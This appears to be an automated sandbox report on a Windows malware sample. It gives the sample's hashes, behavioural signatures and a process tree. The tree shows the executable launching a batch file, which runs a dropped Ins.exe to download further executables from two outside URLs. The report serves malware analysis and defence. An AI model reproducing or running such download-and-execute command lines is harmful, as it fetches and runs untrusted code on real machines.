Analysis
-
max time kernel
161s -
max time network
182s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
30/12/2023, 00:49
Static task
static1
Behavioral task
behavioral1
Sample
0911441061894b90e42a529e5c160ccd.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
0911441061894b90e42a529e5c160ccd.exe
Resource
win10v2004-20231215-en
General
-
Target
0911441061894b90e42a529e5c160ccd.exe
-
Size
94KB
-
MD5
0911441061894b90e42a529e5c160ccd
-
SHA1
acce46815a6e101c09405f0a466dcb10e14d700b
-
SHA256
32ee4de13f5ed088bf89be3f3b9232994e166d96ad1a34e66aafb316791ec465
-
SHA512
bb955568898b8a1f02ec983295fb33f9b7944eb81b642cdc390580bb21d11f6141396316b4d444888f144b4cae90721764e545da69f3d88c9a4f2149fe8cc64a
-
SSDEEP
1536:hgDQRnx6JuH2js2nzhl31VXsrNXGh62DZjZgA7dMBCkK:3txgSosaP3UrNWpZqA7dT
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 4860 Ins.exe 752 Ins.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2388 wrote to memory of 2896 2388 0911441061894b90e42a529e5c160ccd.exe 89 PID 2388 wrote to memory of 2896 2388 0911441061894b90e42a529e5c160ccd.exe 89 PID 2388 wrote to memory of 2896 2388 0911441061894b90e42a529e5c160ccd.exe 89 PID 2896 wrote to memory of 4860 2896 cmd.exe 91 PID 2896 wrote to memory of 4860 2896 cmd.exe 91 PID 2896 wrote to memory of 4860 2896 cmd.exe 91 PID 2896 wrote to memory of 752 2896 cmd.exe 93 PID 2896 wrote to memory of 752 2896 cmd.exe 93 PID 2896 wrote to memory of 752 2896 cmd.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\0911441061894b90e42a529e5c160ccd.exe"C:\Users\Admin\AppData\Local\Temp\0911441061894b90e42a529e5c160ccd.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Users\Admin\AppData\Local\Temp\~DC75.bat "C:\Users\Admin\AppData\Local\Temp\0911441061894b90e42a529e5c160ccd.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Users\Admin\AppData\Local\Ins.exe"C:\Users\Admin\AppData\Local\ins.exe" "http://dl.pipi.cn/pipi_dae_473.exe"3⤵
- Executes dropped EXE
PID:4860
-
-
C:\Users\Admin\AppData\Local\Ins.exe"C:\Users\Admin\AppData\Local\ins.exe" "http://www.xunlei100.com/msn/software/partner/w/bibibei20.exe"3⤵
- Executes dropped EXE
PID:752
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
25KB
MD5956e9eaaf57a8c8630a19ada434ccfda
SHA1acda7ee39276fc3d94b02d258687a0b24461d162
SHA2567774c6545fcea38e9492780ee6c5ea4d60d71a4343014018b8b3577c084e5c66
SHA512cb36ec6ec3229c02f9dcd4a6374711bb4586e9dd257d1fc19c4938b6fcc2046fe57432ab2a09a242bc9f640bd90ea31a96ac593a4c9e49b65388af40fbedf996
-
Filesize
151B
MD5aa8379711ae47175300cb2e5c5564240
SHA1f41a3f91673306caa57ebeb8b6e278478521c9cc
SHA256884ad4d075a5d186a9dfb75e49ecb45609c8fe3da1795812438933f970303a8a
SHA5126a271b589fdb903d286e22aa4b242d37ec8c5136291cb856e68a2a61e1ebec160e636f1f04ee86ec9a0697b13c64829bcde17bc0020d1e95e5a39e436df7dd43